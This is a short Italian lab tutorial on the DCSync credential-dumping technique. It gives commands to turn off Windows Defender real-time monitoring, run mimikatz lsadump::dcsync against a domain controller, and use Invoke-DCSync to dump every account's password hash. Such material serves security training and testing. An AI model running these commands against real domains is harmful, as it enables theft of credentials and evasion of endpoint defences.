
Invoke-DCSync
Invoke-DCSync Riferimento: https://adsecurity.org/?p=1729 Riferimento: https://silentbreaksecurity.com/invoke-dcsync-because-we-all-wanted-it/ Obiettivo: recuperare gli hash delle password di tutti gli account utente su un controller di dominio utilizzando la funzione DCSync di mimikatz
Avviso: esegui questa operazione solo in un ambiente di laboratorio.
mimikatz ha implementato uno strumento chiamato DCSync, che consente a mimikatz di impersonare un controller di dominio e tentare di recuperare tutti gli hash delle password da un altro controller di dominio.
Potrebbe essere necessario disabilitare Windows Defender
Apri PowerShell come amministratore e digita
$ Set-MpPreference -DisableRealtimeMonitoring $true
Avvia mimikatz
$ lsadump::dcsync /domain:test.local /user:Administrator
Ora hai l'hash della password di quell'utente
Questo richiede che tu abbia accesso come amministratore, in particolare l'attributo Common Name Get-Replication-Changes-All
Puoi usare il modulo Invoke-DCSync per estrarre tutti gli hash.
Scarica da: https://gist.github.com/monoxgas/9d238accd969550136db
$ Import-Module ./Invoke-DCSync.ps1
$ Invoke-DCSync -PWDumpFormat